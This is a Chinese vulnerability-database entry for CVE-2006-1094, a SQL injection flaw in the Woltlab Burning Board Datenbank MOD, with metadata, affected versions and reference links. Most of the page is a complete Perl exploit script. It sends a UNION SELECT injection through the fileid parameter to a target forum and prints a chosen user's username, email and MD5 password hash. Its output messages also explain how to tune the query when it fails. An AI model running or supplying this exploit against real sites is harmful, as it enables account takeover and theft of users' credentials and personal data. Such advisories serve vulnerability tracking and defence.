Woltlab Burning Board Datenbank MOD多个SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109840 漏洞类型 SQL注入
发布时间 2006-03-01 更新时间 2007-02-16
CVE编号 CVE-2006-1094 CNNVD-ID CNNVD-200603-131
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1544
https://www.securityfocus.com/bid/16914
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-131
|漏洞详情
在WoltlabBurningBoard的DatenbankMOD2.7及其早期版本中存在SQL注入漏洞,远程攻击者可以通过以下途径,执行任意SQL命令:用于(1)info_db.php或(2)database.php中的字段参数。
|漏洞EXP
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: wbb.pl <victim> <directory> <modpage> <dbnum> <userid>
#Original Advisory: http://www.nukedx.com/?viewdoc=17
use IO::Socket;
if(@ARGV < 5){
print "
+*************************************************************************+
+Woltlab Burning Board 2.x (Datenbank MOD fileid) Remote SQL Injection XPL+
+      Usage: wbb.pl <victim> <directory> <modpage> <dbnum> <userid>      +
+                Example: wbb.pl sux.com / info_db.php  1 1               +
+                  Method found & Exploit scripted by nukedx              +
+*************************************************************************+
";
exit();
}
#Local variables
$wbbserver = $ARGV[0];
$wbbserver =~ s/(http:\/\/)//eg;
$wbbhost = "http://".$wbbserver;
$port = "80";
$wbbdir = $ARGV[1];
$wbbpage  = $ARGV[2];
$wbbdbid = $ARGV[3];
$wbbid = $ARGV[4];
$wbbtar = $wbbpage."?action=file&subkatid=1&noheader=1&fileid=";
$wbbxp = "-1/**/UNION/**/SELECT/**/0,0,0,username,email,0,0,0,0,0,password,0,0,0,0,0,0,0/**/FROM/**/bb".$wbbdbid."_users/**/where/**/userid=".$wbbid;
$wbbreq = $wbbhost.$wbbdir.$wbbtar.$wbbxp;
$tag = "'s";
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $wbbserver\n";
$wbb = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$wbbserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $wbb "GET $wbbreq\n";
print $wbb "Host: $wbbserver\n";
print $wbb "Accept: */*\n";
print $wbb "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$wbb>) {
if ($answer =~ /<span class=\"smallfont\"><b>(.*?)<\/b> <\/td>/){ 
print "+ Exploit succeed! Getting USERID: $wbbid$tag login information.\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /([\d,a-f]{32})<\/td>/) { 
print "+ MD5 HASH OF PASSWORD: $1\n";
}
if ($answer =~ /<p><ul>(.*?)<\/ul><\/td>/) { 
print "+ MAIL: $1\n";
print "+ SQL Injection exploit has been succesfully finished.\n";
print "+ Woltlab runs on: $wbbhost$wbbdir\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /users' doesn't exist /) { 
print "+ This version of Datenbank MOD is vulnerable too but you have speficied wrong database number!\n";
print "+**********************************************************************+\n";
exit(); 
}
if ($answer =~ /number of columns/) { 
print "+ This version of Datenbank MOD is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit(); 
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";

# nukedx.com [2006-03-01]

# milw0rm.com [2006-03-01]
|受影响的产品
Woltlab Burning Board 2.7 Woltlab Burning Board 2.6 Woltlab Burning Board 2.5 Woltlab Burning Board 2.4 Woltlab Burning Board 2.3.3 Woltlab Burning Board 2.3.1
|参考资料

来源:BID
名称:16914
链接:http://www.securityfocus.com/bid/16914
来源:BUGTRAQ
名称:20060301WoltlabBurningBoard2.x(DatenbankMODfileid)MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/426583
来源:MISC
链接:http://www.nukedx.com/?viewdoc=17
来源:OSVDB
名称:23810
链接:http://www.osvdb.org/23810
来源:OSVDB
名称:23808
链接:http://www.osvdb.org/23808